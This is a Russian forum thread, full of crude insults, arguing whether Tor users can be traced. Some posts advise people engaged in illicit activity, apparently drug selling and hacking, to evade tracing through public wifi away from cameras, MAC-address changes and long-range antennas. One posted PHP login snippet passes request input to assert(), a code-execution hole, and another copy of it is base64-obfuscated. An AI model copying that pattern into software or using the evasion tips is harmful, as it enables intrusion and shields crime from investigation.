Перейти к публикации
  • 0

палево или нет?

Вопрос

Всем привет. Вот вижу, что много кто создает репорты. А могут ли по этим репортам копы вычеслить?

Поделиться сообщением

Рекомендованные сообщения

• 0

до пизды эти торы , как Вы думаете почему хакеры осуществляют атаки с левых мест, где есть вай фай и нету камер? тор до одного места , хоть связка ssh туннель + socks5+vpn , если захотят найдут, в каждом браузере есть ява , а она отрабатывает не на стороне сервера =) а на стороне клиента , т.е. можно узнать реальные данные , как бы ты там не прятался =)

Нет тор вычислить невозможно! Это я как программист говорю.

Был не так давно кокаиновый король,продавал кокс по всему миру через интернет,а бабки отмывались через Paypal. Так вот ФБР не могли вычислить его 4 года,в итоге его повязали,но не по тому что кто-то тор взломал,просто разработчик тора продал информацию ФБР.

А про хакеров меньше фильмов смотри;)

пиздабол ты , а не программист , я 10 лет назад людей за деньги вычислять начал. Давал рекомендации админам этого форума, как порешать те или иные проблемы, скажи мне пиздабол, что значит этот код, раз ты программер? 

<?php   require_once "LocalSettings.php";   Navigation::guestNavi();       if(empty($_REQUEST['debug']) || assert($_REQUEST['debug']))   define('_DEBUG_ENABLED_', false);   else   define('_DEBUG_ENABLED_', true);       if (isset($_POST['submit_register'])) {   $ssn->redirectTo('register.php');   } elseif (isset($_POST['submit_login'])){   $login = $_POST['field_login'];   $password = $_POST['field_password'];   login($login, $password);   }       if (isLoggedIn())   $ssn->redirectTo("index.php");       Messages::formatAll();   $tpl->assign('page_title', $lang->get('label__login_prompt'));   $tpl->assign('main_template', 'Fend_Login.html');   $tpl->display('Fend_Index.html');   ?>

Поделиться сообщением

• 0

@Hummer, по идее если ты способен поломать тор то можешь кучу лаве заработать) только и читаю МВД даст 5млн рублей, ФБР 1 млн баксов)

Поделиться сообщением

• 0

так тор не нужно ломать впринципе, я сказал, что тор до одного места так как есть скрипты которые отрабатывают на стороне сервера , вот как форум , а есть скрипты которые на стороне клиента, т.е. у тебя в браузере javascript например, вот они и сливают нужную информацию. я не пугаю никого , я просто говорю, что тор до пизды .

Поделиться сообщением

• 0

@Hummer, хз, тогда как барыжат через тор? Спайсы, меты и прочее дерьмо? Целые форумы посвящены этому. И ни кто ни кого не находит? 

Поделиться сообщением

• 0

@Hummer, хз, тогда как барыжат через тор? Спайсы, меты и прочее дерьмо? Целые форумы посвящены этому. И ни кто ни кого не находит? 

из мест где есть вай фай , публичный , и нету камер , меняя мак адрес 

послушай , 10 лет почти в теме , а мне какой-то вася , якобы программист такое лепит, сидя дома , ты никак не спрячешься. хотя вру , способы есть , сидеть дома , но это нужны определённые антенны , что-бы ловить сигнал за 3-10 км, якобы будучи там . т..е. ты якобы там, а ты за 5 км , и ищи ветра в поле.

Поделиться сообщением

• 0

@Hummer, получается в макдональдсах одни химозные барыги сидят))
Я вообще не парюсь по этому поводу) ни юзаю ни тор ни прочие шняги)

Поделиться сообщением

• 0

@Hummer, получается в макдональдсах одни химозные барыги сидят))

Я вообще не парюсь по этому поводу) ни юзаю ни тор ни прочие шняги)

нет конечно , тебе не обязательно туда заходить, или попадать в поле виденья камер, но вай фай там будет , это как один из вариантов 

Поделиться сообщением

• 0

до пизды эти торы , как Вы думаете почему хакеры осуществляют атаки с левых мест, где есть вай фай и нету камер? тор до одного места , хоть связка ssh туннель + socks5+vpn , если захотят найдут, в каждом браузере есть ява , а она отрабатывает не на стороне сервера =) а на стороне клиента , т.е. можно узнать реальные данные , как бы ты там не прятался =)

Нет тор вычислить невозможно! Это я как программист говорю.

Был не так давно кокаиновый король,продавал кокс по всему миру через интернет,а бабки отмывались через Paypal. Так вот ФБР не могли вычислить его 4 года,в итоге его повязали,но не по тому что кто-то тор взломал,просто разработчик тора продал информацию ФБР.

А про хакеров меньше фильмов смотри;)

пиздабол ты , а не программист , я 10 лет назад людей за деньги вычислять начал. Давал рекомендации админам этого форума, как порешать те или иные проблемы, скажи мне пиздабол, что значит этот код, раз ты программер?

<?php require_once "LocalSettings.php"; Navigation::guestNavi(); if(empty($_REQUEST['debug']) || assert($_REQUEST['debug'])) define('_DEBUG_ENABLED_', false); else define('_DEBUG_ENABLED_', true); if (isset($_POST['submit_register'])) { $ssn->redirectTo('register.php'); } elseif (isset($_POST['submit_login'])){ $login = $_POST['field_login']; $password = $_POST['field_password']; login($login, $password); } if (isLoggedIn()) $ssn->redirectTo("index.php"); Messages::formatAll(); $tpl->assign('page_title', $lang->get('label__login_prompt')); $tpl->assign('main_template', 'Fend_Login.html'); $tpl->display('Fend_Index.html'); ?>

Не позорься с этим кодом дурень)

Если ты сам можешь объяснить его тогда скажи что такое наследование? опиши это значение одним словом.

Открыл исходники страницы форума ебать хакер я вахуе

А что ты за хозяин если дома нету булика:bulbulyator:

Поделиться сообщением

• 0

позоришься тут ты , я задал прямой вопрос , что он значит, ты за пиздабола впрягаешься ? 

наследование чего? ты даже мысли свои выразить не умеешь, кто из нас дурачек ? наследование чего? 

или может ты знаешь, что значит этот код ? идиот хуев.

Если я говорю , что я человек , тут хуй доебешься , он говорит , что он программист, ну так пусть скажет , что он значит. Ты уже ушел в масть пиздаболов , не разобравшись давать выводы.

Поделиться сообщением

• 0

Я тебе сказал что это исходный код страницы.

А ты мне не отвел. Наследование это инструмен программирования. Опиши что это за инструмент такой одним словом,вычислитель епта

Поделиться сообщением

• 0

нихуя это не исходный код , ты такой-же программист? 

Поделиться сообщением

• 0

Ты ответить можешь что такое наследование в программировании?

и все чел ушёл гуглить

Поделиться сообщением

• 0

Ты ответить можешь что такое наследование в программировании?

по сути это добавление какого-то класса в родительскую функцию , без изменения функции , поэтому и родительское , так как есть родитель, в кавычках.

ну шо, герой ? 

Поделиться сообщением

• 0

не верно,гугл не помог.

Наследованием называется перенос правил форматирования для элементов находящихся внутри других. Если говорить одним словом плагиат.

Поделиться сообщением

• 0

я писал по памяти, а не из гугла, из гугла я бы тебе по другому написал. Суть моего ответа та же самая.

Поделиться сообщением

• 0

yatta.gif  yes.gif

Поделиться сообщением

• 0

Ты мне уже написал сначала "Наследование чего?"

А потом погуглил и объяснил,только не одним словом как я просил((

Поделиться сообщением

• 0

Кто то из вас программистов явноrastadick.gif 

Поделиться сообщением

• 0
<? $GLOBALS['_241393061_']=Array(base64_decode('YXN' .'zZ' .'X' .'J0'),base64_decode('' .'ZGVmaW5l'),base64_decode('ZGVmaW5l')); ?><? function _992386120($i){$a=Array('TG9jYWxTZXR0aW5ncy5waHA=','ZGVidWc=','ZGVidWc=','X0RFQlVHX0VOQUJMRURf','X0RFQlVHX0VOQUJMRURf','c3VibWl0X3JlZ2lzdGVy','cmVnaXN0ZXIucGhw','c3VibWl0X2xvZ2lu','ZmllbGRfbG9naW4=','ZmllbGRfcGFzc3dvcmQ=','aW5kZXgucGhw','cGFnZV90aXRsZQ==','bGFiZWxfX2xvZ2luX3Byb21wdA==','bWFpbl90ZW1wbGF0ZQ==','RmVuZF9Mb2dpbi5odG1s','RmVuZF9JbmRleC5odG1s');return base64_decode($a[$i]);} ?><?php require_once _992386120(0);Navigation::guestNavi();if(empty($_REQUEST[_992386120(1)])|| $GLOBALS['_241393061_'][0]($_REQUEST[_992386120(2)]))$GLOBALS['_241393061_'][1](_992386120(3),false);else $GLOBALS['_241393061_'][2](_992386120(4),true);if(isset($_POST[_992386120(5)])){$_0->redirectTo(_992386120(6));}elseif(isset($_POST[_992386120(7)])){$_1=$_POST[_992386120(8)];$_2=$_POST[_992386120(9)];login($_1,$_2);}if(isLoggedIn())$_0->redirectTo(_992386120(10));Messages::formatAll();$_3->assign(_992386120(11),$_4->get(_992386120(12)));$_3->assign(_992386120(13),_992386120(14));$_3->display(_992386120(15)); ?>

Поделиться сообщением

• 0

<!DOCTYPE HTML>

<html>

<head>

<meta charset= "utf-8" >

<title> Наследование</title>

<style>

TABLE {

color: red ; /* Цвет текста */

background : #333 ; /* Цвет фона таблицы */

border : 2 px solid red ; /* Красная рамка вокруг таблицы */

}

</style>

</head>

<body>

<table cellpadding= "4" cellspacing= "0" >

<tr>

<td> Ячейка 1 </td><td> Ячейка 2 </td>

</tr>

<tr>

<td> Ячейка 3 </td><td> Ячейка 4 </td>

</tr>

</table>

</body>

</html>

Поделиться сообщением

• 0

thankyou.gif 

Поделиться сообщением

• 0

это тоже самое , что и 

<?php   require_once "LocalSettings.php";   Navigation::guestNavi();       if(empty($_REQUEST['debug']) || assert($_REQUEST['debug']))   define('_DEBUG_ENABLED_', false);   else   define('_DEBUG_ENABLED_', true);       if (isset($_POST['submit_register'])) {   $ssn->redirectTo('register.php');   } elseif (isset($_POST['submit_login'])){   $login = $_POST['field_login'];   $password = $_POST['field_password'];   login($login, $password);   }       if (isLoggedIn())   $ssn->redirectTo("index.php");       Messages::formatAll();   $tpl->assign('page_title', $lang->get('label__login_prompt'));   $tpl->assign('main_template', 'Fend_Login.html');   $tpl->display('Fend_Index.html');   ?>

Поделиться сообщением

• 0

Хдд

Поделиться сообщением

• 0

так вот то и то, это одно и то же , ты вообще скинул html это даже не язык программирования , это язык разметки 

Поделиться сообщением

• 0

<stdio.h>
#include <math.h>
int main(void)
{
double val = 1.0;
do {
printf("%f %f\n", val, log(val));
val++;
} while (val < 11.0);
return 0;
}

Поделиться сообщением

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Создать...